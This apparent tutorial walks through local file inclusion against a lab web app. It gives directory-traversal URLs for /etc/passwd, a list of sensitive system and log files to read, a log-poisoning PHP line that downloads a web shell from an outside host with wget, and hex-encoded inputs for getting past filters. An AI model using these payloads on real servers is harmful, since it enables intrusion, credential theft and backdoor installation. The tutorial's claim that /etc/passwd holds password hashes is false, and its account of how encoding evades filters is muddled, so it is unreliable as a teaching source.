Here is the sample link of the vulnerable path : http://127.0.0.1/vulnerabilities/fi/?page=include.php

Now, let us try to do a directory traversal to the passwd file of the web server:

http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd


In most cases, you just need to add some few ../ before the /etc/passwd:

http://127.0.0.1/vulnerabilities/fi/?page=../etc/passwd


http://127.0.0.1/vulnerabilities/fi/?page=../../etc/passwd

http://127.0.0.1/vulnerabilities/fi/?page=../../../etc/passwd  

So on and so forth until you see the image above. This is very dangerous especially if it's a Linux server because the passwd file shows the the hashes of the passwords on the server which could be possibly cracked in order to gain access on the server.

You can also visit other directories which can be used for information gathering and maybe we can see some luck in probing the web server:

/etc/environment
/etc/shadow

/etc/sudoers

/etc/group

/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

/var/log/messages

var/log/mysql.log

/var/log/user.log

/var/www/logs/error_log

There are many ways to exploit a web server, an attacker could inject a PHP code or a backdoor into the HTTPD logs, and access them via LFI again:

/var/log/apache/error_log

/apache/logs/access.log

var/log/error.log

/* and many more */

Other people may also use a Firefox add-on User-Agent switcher  and spawn a shell:

<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>

Some admins may do some filter evasion to prevent common attacks of LFI, so what we are going to do is to encode one or more characters into hexadecimal because the browser decodes the input but the PHP does not. Example input:

http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages

http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd